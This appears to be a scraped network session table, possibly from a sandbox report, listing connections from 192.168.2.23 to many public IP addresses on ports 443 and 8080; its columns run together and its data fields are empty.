                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19255192.168.2.2344228204.54.224.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19256192.168.2.2337152170.22.74.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19257192.168.2.236028896.108.200.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19258192.168.2.2345108155.38.160.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19259192.168.2.2339884210.116.223.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19260192.168.2.2357272118.22.50.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19261192.168.2.2348222155.71.250.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19262192.168.2.2336672201.7.190.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19263192.168.2.2357214118.91.4.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19264192.168.2.2343982158.13.80.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19265192.168.2.2336368107.177.173.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19266192.168.2.2340354109.159.244.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19267192.168.2.2353592176.167.107.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19268192.168.2.2349552142.107.153.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19269192.168.2.2354732113.120.178.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19270192.168.2.2351570120.111.232.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19271192.168.2.2336278134.201.167.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19272192.168.2.2342398184.98.72.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19273192.168.2.2352320177.98.188.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19274192.168.2.233705095.239.134.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19275192.168.2.234504471.193.9.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19276192.168.2.2352466192.166.9.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19277192.168.2.2356700218.135.97.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19278192.168.2.2336746100.50.183.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19279192.168.2.2336888207.181.71.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19280192.168.2.2355174148.84.66.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19281192.168.2.2350746189.73.126.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19282192.168.2.2349546200.71.44.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19283192.168.2.2354578220.221.27.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19284192.168.2.235535671.89.131.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19285192.168.2.235279073.249.176.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19286192.168.2.235538012.25.61.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19287192.168.2.2353448174.69.7.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19288192.168.2.234144224.25.161.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19289192.168.2.2340034151.54.167.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19290192.168.2.234649243.35.132.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19291192.168.2.235233887.251.90.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19292192.168.2.2341368103.56.188.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19293192.168.2.2333594147.159.141.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19294192.168.2.2333826167.67.61.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19295192.168.2.2344856193.194.116.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19296192.168.2.2341176217.100.90.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19297192.168.2.233517487.30.156.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19298192.168.2.233489064.188.237.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19299192.168.2.2359280159.202.53.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19300192.168.2.2339116179.241.67.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19301192.168.2.2347614124.220.196.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19302192.168.2.235585094.72.79.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19303192.168.2.2349294221.247.141.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19304192.168.2.2351904122.144.214.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19305192.168.2.2347688137.153.6.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19306192.168.2.233842251.132.132.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19307192.168.2.2359620174.13.74.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19308192.168.2.233404645.95.96.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19309192.168.2.235553647.20.64.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19310192.168.2.234997451.98.14.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19311192.168.2.235838240.154.48.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19312192.168.2.235718682.252.236.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19313192.168.2.2347608175.145.116.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19314192.168.2.2336196132.123.201.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19315192.168.2.233806834.211.223.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19316192.168.2.2349346167.201.223.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19317192.168.2.2336394171.86.121.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19318192.168.2.2335224140.148.135.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19319192.168.2.2351654183.152.14.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19320192.168.2.235189468.201.114.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19321192.168.2.2332940212.112.56.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19322192.168.2.234996054.171.184.1938080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19323192.168.2.235645676.14.6.398080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19324192.168.2.233444844.236.160.678080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19325192.168.2.236015438.153.49.358080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19326192.168.2.2333874196.51.231.68080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19327192.168.2.2338434109.201.213.1418080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19328192.168.2.2349932121.150.49.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19329192.168.2.2333574191.164.154.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19330192.168.2.23335261.137.151.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19331192.168.2.2336626147.196.8.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19332192.168.2.235337825.58.74.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19333192.168.2.2341022140.181.72.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19334192.168.2.233752488.29.30.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19335192.168.2.2355690178.90.204.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19336192.168.2.2349290155.197.144.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19337192.168.2.234940290.51.226.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19338192.168.2.235594688.68.120.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19339192.168.2.233872849.133.250.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19340192.168.2.233706013.92.45.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19341192.168.2.23473261.227.187.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19342192.168.2.234779097.49.216.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19343192.168.2.2336772111.26.158.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19344192.168.2.2348188103.17.206.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19345192.168.2.2333326166.22.25.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19346192.168.2.2358626108.33.74.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19347192.168.2.235109479.42.84.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19348192.168.2.233663639.117.65.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19349192.168.2.2344026103.160.228.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19350192.168.2.2349044132.173.62.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19351192.168.2.235662823.224.82.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19352192.168.2.233499624.90.118.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19353192.168.2.2356234156.60.218.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19354192.168.2.233286436.180.250.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19355192.168.2.233640044.86.104.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19356192.168.2.235708245.33.19.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19357192.168.2.2346588201.169.19.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19358192.168.2.2338604110.27.121.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19359192.168.2.235587485.105.43.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19360192.168.2.235933819.176.76.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19361192.168.2.234475666.87.111.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19362192.168.2.2347534184.253.143.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19363192.168.2.2345466104.76.98.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19364192.168.2.2346614156.148.23.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19365192.168.2.23360509.94.186.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19366192.168.2.2360806183.168.127.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19367192.168.2.234967437.190.1.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19368192.168.2.234769851.65.133.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19369192.168.2.2333352135.125.76.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19370192.168.2.234264066.100.17.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19371192.168.2.2342912116.234.182.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19372192.168.2.2355184115.141.83.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19373192.168.2.235101051.233.159.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19374192.168.2.2341256107.168.140.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19375192.168.2.2339220169.109.224.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19376192.168.2.2339072103.156.55.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19377192.168.2.235630040.161.62.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19378192.168.2.2360256147.142.239.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19379192.168.2.2343098118.126.229.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19380192.168.2.2349774121.139.230.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19381192.168.2.2344880180.144.41.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19382192.168.2.2345392141.28.70.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19383192.168.2.2339890216.251.109.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19384192.168.2.235242027.238.1.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19385192.168.2.2341708139.55.122.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19386192.168.2.235252457.78.96.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19387192.168.2.2338302159.115.77.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19388192.168.2.234041043.168.250.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19389192.168.2.23573161.8.89.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19390192.168.2.2342388201.147.193.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19391192.168.2.2357818217.193.172.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19392192.168.2.2355736178.125.22.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19393192.168.2.235638277.75.36.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19394192.168.2.2333766149.84.23.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19395192.168.2.233302683.165.5.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19396192.168.2.2343110185.161.90.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19397192.168.2.2355040144.47.194.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19398192.168.2.2346904134.31.9.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19399192.168.2.234753849.63.194.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19400192.168.2.2343904178.225.166.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19401192.168.2.2354040197.148.26.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19402192.168.2.2355798144.139.17.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19403192.168.2.2350116138.13.91.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19404192.168.2.233874872.14.124.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19405192.168.2.234216453.8.12.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19406192.168.2.233498890.128.105.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19407192.168.2.235159475.246.124.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19408192.168.2.2351214115.54.53.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19409192.168.2.2351042123.153.200.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19410192.168.2.235742289.27.163.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19411192.168.2.233821634.42.195.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19412192.168.2.2344452209.200.121.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19413192.168.2.2354372129.120.105.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19414192.168.2.235226078.255.191.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19415192.168.2.2360978119.127.15.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19416192.168.2.2339294181.110.186.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19417192.168.2.235634631.60.214.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19418192.168.2.2359754140.163.84.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19419192.168.2.2346408201.85.51.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19420192.168.2.2351438204.113.167.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19421192.168.2.2348974171.247.213.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19422192.168.2.234508089.210.74.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19423192.168.2.2338278172.111.208.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19424192.168.2.2354188114.54.47.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19425192.168.2.235917296.165.131.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19426192.168.2.2344082185.44.252.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19427192.168.2.2345536157.178.189.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19428192.168.2.234816092.221.137.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19429192.168.2.2340526142.72.106.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19430192.168.2.234773039.254.131.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19431192.168.2.235139060.145.247.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19432192.168.2.234799096.151.205.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19433192.168.2.2338070145.97.0.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19434192.168.2.2358576122.125.199.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19435192.168.2.2360820189.72.178.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19436192.168.2.235941827.29.154.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19437192.168.2.235311878.185.201.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19438192.168.2.233573481.4.166.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19439192.168.2.2358768170.104.25.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19440192.168.2.2349398172.193.91.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19441192.168.2.2359790219.166.20.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19442192.168.2.2346450192.86.5.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19443192.168.2.234067023.146.244.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19444192.168.2.2359606172.96.80.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19445192.168.2.235889232.89.123.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19446192.168.2.2335402138.209.59.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19447192.168.2.2350848125.138.235.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19448192.168.2.234345658.202.15.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19449192.168.2.2354512222.189.143.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19450192.168.2.2351194114.131.68.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19451192.168.2.2359640195.86.151.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19452192.168.2.2346956194.1.243.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19453192.168.2.235880290.78.250.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19454192.168.2.2334852222.28.178.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19455192.168.2.2335664122.170.242.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19456192.168.2.235260879.72.32.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19457192.168.2.234882812.15.32.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19458192.168.2.2343840205.251.170.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19459192.168.2.235167287.100.190.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19460192.168.2.234433259.236.108.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19461192.168.2.2341444160.190.148.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19462192.168.2.2337436219.172.75.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19463192.168.2.2339432176.183.89.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19464192.168.2.2356104172.163.180.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19465192.168.2.2356420178.176.200.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19466192.168.2.2338246178.240.143.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19467192.168.2.234865632.104.65.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19468192.168.2.2354314102.214.146.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19469192.168.2.2344368116.203.120.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19470192.168.2.2344498222.100.147.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19471192.168.2.2356392134.74.10.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19472192.168.2.235551897.93.186.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19473192.168.2.233698857.135.72.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19474192.168.2.2352624114.186.226.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19475192.168.2.234049443.48.83.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
